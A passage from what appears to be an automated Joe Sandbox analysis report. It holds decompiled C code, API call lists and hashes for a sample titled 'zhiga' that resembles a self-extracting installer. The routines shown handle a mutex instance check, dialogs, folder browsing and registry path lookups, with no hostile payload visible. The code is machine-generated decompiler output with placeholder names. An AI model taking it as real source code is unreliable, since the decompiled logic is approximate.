                                                          										_t57 = _t65;
                                                          										if(E010936EE(_t65) == 0) {
                                                          											goto L33;
                                                          										} else {
                                                          											_t33 =  *0x1099a40; // 0x3
                                                          											_t48 = 1;
                                                          											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                          												if(( *0x1099a34 & 0x00000100) == 0 || ( *0x1098a38 & 0x00000001) != 0 || E010918A3(_t64, _t66) != 0) {
                                                          													goto L30;
                                                          												} else {
                                                          													_t64 = 0x7d6;
                                                          													if(E01096517(_t57, 0x7d6, _t34, E010919E0, 0x547, 0x83e) != 0x83d) {
                                                          														goto L33;
                                                          													} else {
                                                          														goto L30;
                                                          													}
                                                          												}
                                                          											} else {
                                                          												L30:
                                                          												_t23 = _t48;
                                                          											}
                                                          										}
                                                          									} else {
                                                          										_t23 = 1;
                                                          									}
                                                          								} else {
                                                          									E01092390(0x1098a3a);
                                                          									goto L33;
                                                          								}
                                                          							} else {
                                                          								_t64 = 0x520;
                                                          								L32:
                                                          								E010944B9(0, _t64, 0, 0, 0x10, 0);
                                                          								goto L33;
                                                          							}
                                                          						} else {
                                                          							_t64 =  &_v268;
                                                          							if(E0109468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                          								goto L3;
                                                          							} else {
                                                          								_t43 = CreateMutexA(0, 1,  &_v268);
                                                          								 *0x1098588 = _t43;
                                                          								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                          									goto L12;
                                                          								} else {
                                                          									if(( *0x1099a34 & 0x00000080) == 0) {
                                                          										_t64 = 0x524;
                                                          										if(E010944B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                          											goto L12;
                                                          										} else {
                                                          											goto L11;
                                                          										}
                                                          									} else {
                                                          										_t64 = 0x54b;
                                                          										E010944B9(0, 0x54b, "zhiga", 0, 0x10, 0);
                                                          										L11:
                                                          										CloseHandle( *0x1098588);
                                                          										 *0x1099124 = 0x800700b7;
                                                          										goto L33;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					} else {
                                                          						L3:
                                                          						_t64 = 0x4b1;
                                                          						E010944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          						 *0x1099124 = 0x80070714;
                                                          						L33:
                                                          						_t23 = 0;
                                                          					}
                                                          				}
                                                          				return E01096CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                          			}




















                                                          APIs
                                                          • memset.MSVCRT ref: 01092CD9
                                                          • memset.MSVCRT ref: 01092CE9
                                                          • memset.MSVCRT ref: 01092CF9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 01092D34
                                                          • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 01092D40
                                                          • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 01092DAE
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 01092DBD
                                                          • CloseHandle.KERNEL32(zhiga,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 01092E0A
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                          • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$zhiga
                                                          • API String ID: 1002816675-3407794480
                                                          • Opcode ID: 3d4e1799dc951a63954435f7dbaed0f599b9ccc6c1e3ec85fed5c82c8685250c
                                                          • Instruction ID: 681bc160b347398e4aae36712cfa038d9973bfa265ca3e4ebf15c50fd0368791
                                                          • Opcode Fuzzy Hash: 3d4e1799dc951a63954435f7dbaed0f599b9ccc6c1e3ec85fed5c82c8685250c
                                                          • Instruction Fuzzy Hash: DB51E6B0340305BAFF7066299D79B7A36D8F795714F00406EB6C1C62C9DABD8841A755
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 81%
                                                          			E010934F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                          				void* _t9;
                                                          				void* _t12;
                                                          				void* _t13;
                                                          				void* _t17;
                                                          				void* _t23;
                                                          				void* _t25;
                                                          				struct HWND__* _t35;
                                                          				struct HWND__* _t38;
                                                          				void* _t39;
                                                          
                                                          				_t9 = _a8 - 0x10;
                                                          				if(_t9 == 0) {
                                                          					__eflags = 1;
                                                          					L19:
                                                          					_push(0);
                                                          					 *0x10991d8 = 1;
                                                          					L20:
                                                          					_push(_a4);
                                                          					L21:
                                                          					EndDialog();
                                                          					L22:
                                                          					return 1;
                                                          				}
                                                          				_push(1);
                                                          				_pop(1);
                                                          				_t12 = _t9 - 0xf2;
                                                          				if(_t12 == 0) {
                                                          					__eflags = _a12 - 0x1b;
                                                          					if(_a12 != 0x1b) {
                                                          						goto L22;
                                                          					}
                                                          					goto L19;
                                                          				}
                                                          				_t13 = _t12 - 0xe;
                                                          				if(_t13 == 0) {
                                                          					_t35 = _a4;
                                                          					 *0x1098584 = _t35;
                                                          					E010943D0(_t35, GetDesktopWindow());
                                                          					__eflags =  *0x1098184; // 0x1
                                                          					if(__eflags != 0) {
                                                          						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                          						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                          					}
                                                          					SetWindowTextA(_t35, "zhiga");
                                                          					_t17 = CreateThread(0, 0, E01094FE0, 0, 0, 0x1098798);
                                                          					 *0x109879c = _t17;
                                                          					__eflags = _t17;
                                                          					if(_t17 != 0) {
                                                          						goto L22;
                                                          					} else {
                                                          						E010944B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                          						_push(0);
                                                          						_push(_t35);
                                                          						goto L21;
                                                          					}
                                                          				}
                                                          				_t23 = _t13 - 1;
                                                          				if(_t23 == 0) {
                                                          					__eflags = _a12 - 2;
                                                          					if(_a12 != 2) {
                                                          						goto L22;
                                                          					}
                                                          					ResetEvent( *0x109858c);
                                                          					_t38 =  *0x1098584; // 0x0
                                                          					_t25 = E010944B9(_t38, 0x4b2, 0x1091140, 0, 0x20, 4);
                                                          					__eflags = _t25 - 6;
                                                          					if(_t25 == 6) {
                                                          						L11:
                                                          						 *0x10991d8 = 1;
                                                          						SetEvent( *0x109858c);
                                                          						_t39 =  *0x109879c; // 0x0
                                                          						E01093680(_t39);
                                                          						_push(0);
                                                          						goto L20;
                                                          					}
                                                          					__eflags = _t25 - 1;
                                                          					if(_t25 == 1) {
                                                          						goto L11;
                                                          					}
                                                          					SetEvent( *0x109858c);
                                                          					goto L22;
                                                          				}
                                                          				if(_t23 == 0xe90) {
                                                          					TerminateThread( *0x109879c, 0);
                                                          					EndDialog(_a4, _a12);
                                                          					return 1;
                                                          				}
                                                          				return 0;
                                                          			}













                                                          APIs
                                                          • TerminateThread.KERNEL32(00000000), ref: 01093535
                                                          • EndDialog.USER32(?,?), ref: 01093541
                                                          • ResetEvent.KERNEL32 ref: 0109355F
                                                          • SetEvent.KERNEL32(01091140,00000000,00000020,00000004), ref: 01093590
                                                          • GetDesktopWindow.USER32 ref: 010935C7
                                                          • GetDlgItem.USER32(?,0000083B), ref: 010935F1
                                                          • SendMessageA.USER32(00000000), ref: 010935F8
                                                          • GetDlgItem.USER32(?,0000083B), ref: 01093610
                                                          • SendMessageA.USER32(00000000), ref: 01093617
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 01093623
                                                          • CreateThread.KERNEL32 ref: 01093637
                                                          • EndDialog.USER32(?,00000000), ref: 01093671
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                          • String ID: zhiga
                                                          • API String ID: 2406144884-3705506974
                                                          • Opcode ID: edb7441c46861828c6e5a39dde9bc11aa0c4606e6817b393c994218fe125c0ea
                                                          • Instruction ID: 1c0a6091f38f82e6c919c94f7bd6ec36b2f19c0a042a296ca7d80f93571e1207
                                                          • Opcode Fuzzy Hash: edb7441c46861828c6e5a39dde9bc11aa0c4606e6817b393c994218fe125c0ea
                                                          • Instruction Fuzzy Hash: 9531AA71244315FBDF701F39AC7DE2A3EA5F789B45F10851AF6C29A298C67A8400DF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E01094224(char __ecx) {
                                                          				char* _v8;
                                                          				_Unknown_base(*)()* _v12;
                                                          				_Unknown_base(*)()* _v16;
                                                          				_Unknown_base(*)()* _v20;
                                                          				char* _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				char _v44;
                                                          				char _v48;
                                                          				char _v52;
                                                          				_Unknown_base(*)()* _t26;
                                                          				_Unknown_base(*)()* _t28;
                                                          				_Unknown_base(*)()* _t29;
                                                          				_Unknown_base(*)()* _t32;
                                                          				char _t42;
                                                          				char* _t44;
                                                          				char* _t61;
                                                          				void* _t63;
                                                          				char* _t65;
                                                          				struct HINSTANCE__* _t66;
                                                          				char _t67;
                                                          				void* _t71;
                                                          				char _t76;
                                                          				intOrPtr _t85;
                                                          
                                                          				_t67 = __ecx;
                                                          				_t66 = LoadLibraryA("SHELL32.DLL");
                                                          				if(_t66 == 0) {
                                                          					_t63 = 0x4c2;
                                                          					L22:
                                                          					E010944B9(_t67, _t63, 0, 0, 0x10, 0);
                                                          					return 0;
                                                          				}
                                                          				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                          				_v12 = _t26;
                                                          				if(_t26 == 0) {
                                                          					L20:
                                                          					FreeLibrary(_t66);
                                                          					_t63 = 0x4c1;
                                                          					goto L22;
                                                          				}
                                                          				_t28 = GetProcAddress(_t66, 0xc3);
                                                          				_v20 = _t28;
                                                          				if(_t28 == 0) {
                                                          					goto L20;
                                                          				}
                                                          				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                          				_v16 = _t29;
                                                          				if(_t29 == 0) {
                                                          					goto L20;
                                                          				}
                                                          				_t76 =  *0x10988c0; // 0x0
                                                          				if(_t76 != 0) {
                                                          					L10:
                                                          					 *0x10987a0 = 0;
                                                          					_v52 = _t67;
                                                          					_v48 = 0;
                                                          					_v44 = 0;
                                                          					_v40 = 0x1098598;
                                                          					_v36 = 1;
                                                          					_v32 = E01094200;
                                                          					_v28 = 0x10988c0;
                                                          					 *0x109a288( &_v52);
                                                          					_t32 =  *_v12();
                                                          					if(_t71 != _t71) {
                                                          						asm("int 0x29");
                                                          					}
                                                          					_v12 = _t32;
                                                          					if(_t32 != 0) {
                                                          						 *0x109a288(_t32, 0x10988c0);
                                                          						 *_v16();
                                                          						if(_t71 != _t71) {
                                                          							asm("int 0x29");
                                                          						}
                                                          						if( *0x10988c0 != 0) {
                                                          							E01091680(0x10987a0, 0x104, 0x10988c0);
                                                          						}
                                                          						 *0x109a288(_v12);
                                                          						 *_v20();
                                                          						if(_t71 != _t71) {
                                                          							asm("int 0x29");
                                                          						}
                                                          					}
                                                          					FreeLibrary(_t66);
                                                          					_t85 =  *0x10987a0; // 0x0
                                                          					return 0 | _t85 != 0x00000000;
                                                          				} else {
                                                          					GetTempPathA(0x104, 0x10988c0);
                                                          					_t61 = 0x10988c0;
                                                          					_t4 =  &(_t61[1]); // 0x10988c1
                                                          					_t65 = _t4;
                                                          					do {
                                                          						_t42 =  *_t61;
                                                          						_t61 =  &(_t61[1]);
                                                          					} while (_t42 != 0);
                                                          					_t5 = _t61 - _t65 + 0x10988c0; // 0x2131181
                                                          					_t44 = CharPrevA(0x10988c0, _t5);
                                                          					_v8 = _t44;
                                                          					if( *_t44 == 0x5c &&  *(CharPrevA(0x10988c0, _t44)) != 0x3a) {
                                                          						 *_v8 = 0;
                                                          					}
                                                          					goto L10;
                                                          				}
                                                          			}





























                                                          APIs
                                                          • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 01094236
                                                          • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0109424C
                                                          • GetProcAddress.KERNEL32(00000000,000000C3), ref: 01094263
                                                          • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0109427A
                                                          • GetTempPathA.KERNEL32(00000104,010988C0,?,00000001), ref: 0109429F
                                                          • CharPrevA.USER32(010988C0,02131181,?,00000001), ref: 010942C2
                                                          • CharPrevA.USER32(010988C0,00000000,?,00000001), ref: 010942D6
                                                          • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 01094391
                                                          • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010943A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                          • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                          • API String ID: 1865808269-1731843650
                                                          • Opcode ID: dc620258f5157f1c4e2c7d6691957ac7a104322094d1607a761d7f5a8ccd4ae6
                                                          • Instruction ID: 63ff4b3ea8d78cb31d360ca520b8ae456c690119af685f1a71df2070dbeb4706
                                                          • Opcode Fuzzy Hash: dc620258f5157f1c4e2c7d6691957ac7a104322094d1607a761d7f5a8ccd4ae6
                                                          • Instruction Fuzzy Hash: 8E41A574A00208AFEF215B79E8B496E7FA4FB46344F0481AAE9C1E7345C77989029774
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010944B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                          				signed int _v8;
                                                          				char _v64;
                                                          				char _v576;
                                                          				void* _v580;
                                                          				struct HWND__* _v584;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t34;
                                                          				void* _t37;
                                                          				signed int _t39;
                                                          				intOrPtr _t43;
                                                          				signed int _t44;
                                                          				signed int _t49;
                                                          				signed int _t52;
                                                          				void* _t54;
                                                          				intOrPtr _t55;
                                                          				intOrPtr _t58;
                                                          				intOrPtr _t59;
                                                          				int _t64;
                                                          				void* _t66;
                                                          				intOrPtr* _t67;
                                                          				signed int _t69;
                                                          				intOrPtr* _t73;
                                                          				intOrPtr* _t76;
                                                          				intOrPtr* _t77;
                                                          				void* _t80;
                                                          				void* _t81;
                                                          				void* _t82;
                                                          				intOrPtr* _t84;
                                                          				void* _t85;
                                                          				signed int _t89;
                                                          
                                                          				_t75 = __edx;
                                                          				_t34 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t34 ^ _t89;
                                                          				_v584 = __ecx;
                                                          				_t83 = "LoadString() Error.  Could not load string resource.";
                                                          				_t67 = _a4;
                                                          				_t69 = 0xd;
                                                          				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                          				_t80 = _t83 + _t69 + _t69;
                                                          				_v580 = _t37;
                                                          				asm("movsb");
                                                          				if(( *0x1098a38 & 0x00000001) != 0) {
                                                          					_t39 = 1;
                                                          				} else {
                                                          					_v576 = 0;
                                                          					LoadStringA( *0x1099a3c, _t75,  &_v576, 0x200);
                                                          					if(_v576 != 0) {
                                                          						_t73 =  &_v576;
                                                          						_t16 = _t73 + 1; // 0x1
                                                          						_t75 = _t16;
                                                          						do {
                                                          							_t43 =  *_t73;
                                                          							_t73 = _t73 + 1;
                                                          						} while (_t43 != 0);
                                                          						_t84 = _v580;
                                                          						_t74 = _t73 - _t75;
                                                          						if(_t84 == 0) {
                                                          							if(_t67 == 0) {
                                                          								_t27 = _t74 + 1; // 0x2
                                                          								_t83 = _t27;
                                                          								_t44 = LocalAlloc(0x40, _t83);
                                                          								_t80 = _t44;
                                                          								if(_t80 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									_t75 = _t83;
                                                          									_t74 = _t80;
                                                          									E01091680(_t80, _t83,  &_v576);
                                                          									goto L23;
                                                          								}
                                                          							} else {
                                                          								_t76 = _t67;
                                                          								_t24 = _t76 + 1; // 0x1
                                                          								_t85 = _t24;
                                                          								do {
                                                          									_t55 =  *_t76;
                                                          									_t76 = _t76 + 1;
                                                          								} while (_t55 != 0);
                                                          								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                          								_t83 = _t25 + _t74;
                                                          								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                          								_t80 = _t44;
                                                          								if(_t80 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									E0109171E(_t80, _t83,  &_v576, _t67);
                                                          									goto L23;
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t77 = _t67;
                                                          							_t18 = _t77 + 1; // 0x1
                                                          							_t81 = _t18;
                                                          							do {
                                                          								_t58 =  *_t77;
                                                          								_t77 = _t77 + 1;
                                                          							} while (_t58 != 0);
                                                          							_t75 = _t77 - _t81;
                                                          							_t82 = _t84 + 1;
                                                          							do {
                                                          								_t59 =  *_t84;
                                                          								_t84 = _t84 + 1;
                                                          							} while (_t59 != 0);
                                                          							_t21 = _t74 + 0x64; // 0x65
                                                          							_t83 = _t21 + _t84 - _t82 + _t75;
                                                          							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                          							_t80 = _t44;
                                                          							if(_t80 == 0) {
                                                          								goto L6;
                                                          							} else {
                                                          								_push(_v580);
                                                          								E0109171E(_t80, _t83,  &_v576, _t67);
                                                          								L23:
                                                          								MessageBeep(_a12);
                                                          								if(E0109681F(_t67) == 0) {
                                                          									L25:
                                                          									_t49 = 0x10000;
                                                          								} else {
                                                          									_t54 = E010967C9(_t74, _t74);
                                                          									_t49 = 0x190000;
                                                          									if(_t54 == 0) {
                                                          										goto L25;
                                                          									}
                                                          								}
                                                          								_t52 = MessageBoxA(_v584, _t80, "zhiga", _t49 | _a12 | _a16);
                                                          								_t83 = _t52;
                                                          								LocalFree(_t80);
                                                          								_t39 = _t52;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						if(E0109681F(_t67) == 0) {
                                                          							L4:
                                                          							_t64 = 0x10010;
                                                          						} else {
                                                          							_t66 = E010967C9(0, 0);
                                                          							_t64 = 0x190010;
                                                          							if(_t66 == 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_t44 = MessageBoxA(_v584,  &_v64, "zhiga", _t64);
                                                          						L6:
                                                          						_t39 = _t44 | 0xffffffff;
                                                          					}
                                                          				}
                                                          				return E01096CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                          			}



































                                                          0x0109466d
                                                          0x0109466f
                                                          0x01094675
                                                          0x01094675
                                                          0x010945ad
                                                          0x01094527
                                                          0x0109452e
                                                          0x0109453f
                                                          0x0109453f
                                                          0x01094530
                                                          0x01094531
                                                          0x01094538
                                                          0x0109453d
                                                          0x00000000
                                                          0x00000000
                                                          0x0109453d
                                                          0x01094554
                                                          0x0109455a
                                                          0x0109455a
                                                          0x0109455a
                                                          0x01094525
                                                          0x0109468c

                                                          APIs
                                                          • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                          • MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                          • LocalAlloc.KERNEL32(00000040,00000065), ref: 010945A3
                                                          • LocalAlloc.KERNEL32(00000040,00000065), ref: 010945E3
                                                          • LocalAlloc.KERNEL32(00000040,00000002), ref: 0109460D
                                                          • MessageBeep.USER32(00000000), ref: 01094630
                                                          • MessageBoxA.USER32(?,00000000,zhiga,00000000), ref: 01094666
                                                          • LocalFree.KERNEL32(00000000), ref: 0109466F
                                                            • Part of subcall function 0109681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0109686E
                                                            • Part of subcall function 0109681F: GetSystemMetrics.USER32(0000004A), ref: 010968A7
                                                            • Part of subcall function 0109681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010968CC
                                                            • Part of subcall function 0109681F: RegQueryValueExA.ADVAPI32(?,01091140,00000000,?,?,0000000C), ref: 010968F4
                                                            • Part of subcall function 0109681F: RegCloseKey.ADVAPI32(?), ref: 01096902
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                          • String ID: LoadString() Error. Could not load string resource.$zhiga
                                                          • API String ID: 3244514340-1120439489
                                                          • Opcode ID: 34df12721fdd623bfded8927412ec99e9f262b12970428d04cea87e138d90df3
                                                          • Instruction ID: 12de0d9944158db692273d8ff31cfa94be77873a9f1dd47ef98b325383ffb28f
                                                          • Opcode Fuzzy Hash: 34df12721fdd623bfded8927412ec99e9f262b12970428d04cea87e138d90df3
                                                          • Instruction Fuzzy Hash: 1251F7B1A00216ABDF219E68CD68BBA7BB8EF45300F004195FDC9E7245DB36D906DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E01092773(CHAR* __ecx, char* _a4) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v269;
                                                          				CHAR* _v276;
                                                          				int _v280;
                                                          				void* _v284;
                                                          				int _v288;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t23;
                                                          				intOrPtr _t34;
                                                          				int _t45;
                                                          				int* _t50;
                                                          				CHAR* _t52;
                                                          				CHAR* _t61;
                                                          				char* _t62;
                                                          				int _t63;
                                                          				CHAR* _t64;
                                                          				signed int _t65;
                                                          
                                                          				_t52 = __ecx;
                                                          				_t23 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t23 ^ _t65;
                                                          				_t62 = _a4;
                                                          				_t50 = 0;
                                                          				_t61 = __ecx;
                                                          				_v276 = _t62;
                                                          				 *((char*)(__ecx)) = 0;
                                                          				if( *_t62 != 0x23) {
                                                          					_t63 = 0x104;
                                                          					goto L14;
                                                          				} else {
                                                          					_t64 = _t62 + 1;
                                                          					_v269 = CharUpperA( *_t64);
                                                          					_v276 = CharNextA(CharNextA(_t64));
                                                          					_t63 = 0x104;
                                                          					_t34 = _v269;
                                                          					if(_t34 == 0x53) {
                                                          						L14:
                                                          						GetSystemDirectoryA(_t61, _t63);
                                                          						goto L15;
                                                          					} else {
                                                          						if(_t34 == 0x57) {
                                                          							GetWindowsDirectoryA(_t61, 0x104);
                                                          							goto L16;
                                                          						} else {
                                                          							_push(_t52);
                                                          							_v288 = 0x104;
                                                          							E01091781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                          							_t59 = 0x104;
                                                          							E0109658A( &_v268, 0x104, _v276);
                                                          							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                          								L16:
                                                          								_t59 = _t63;
                                                          								E0109658A(_t61, _t63, _v276);
                                                          							} else {
                                                          								if(RegQueryValueExA(_v284, 0x1091140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                          									_t45 = _v280;
                                                          									if(_t45 != 2) {
                                                          										L9:
                                                          										if(_t45 == 1) {
                                                          											goto L10;
                                                          										}
                                                          									} else {
                                                          										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                          											_t45 = _v280;
                                                          											goto L9;
                                                          										} else {
                                                          											_t59 = 0x104;
                                                          											E01091680(_t61, 0x104,  &_v268);
                                                          											L10:
                                                          											_t50 = 1;
                                                          										}
                                                          									}
                                                          								}
                                                          								RegCloseKey(_v284);
                                                          								L15:
                                                          								if(_t50 == 0) {
                                                          									goto L16;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return E01096CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                          			}

                                                          APIs
                                                          • CharUpperA.USER32(08A9C601,00000000,00000000,00000000), ref: 010927A8
                                                          • CharNextA.USER32(0000054D), ref: 010927B5
                                                          • CharNextA.USER32(00000000), ref: 010927BC
                                                          • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01092829
                                                          • RegQueryValueExA.ADVAPI32(?,01091140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01092852
                                                          • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01092870
                                                          • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010928A0
                                                          • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010928AA
                                                          • GetSystemDirectoryA.KERNEL32 ref: 010928B9
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010927E4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                          • API String ID: 2659952014-2428544900
                                                          • Opcode ID: c0454feecf8a06ceb888e6d2f8f1d204e74da8cdcffbbd2fb3908a3841c8607d
                                                          • Instruction ID: 22dbf7266e1cc9a28c1518194a0eac2e3aa0be07300de8a84570ac5344a20fd4
                                                          • Opcode Fuzzy Hash: c0454feecf8a06ceb888e6d2f8f1d204e74da8cdcffbbd2fb3908a3841c8607d
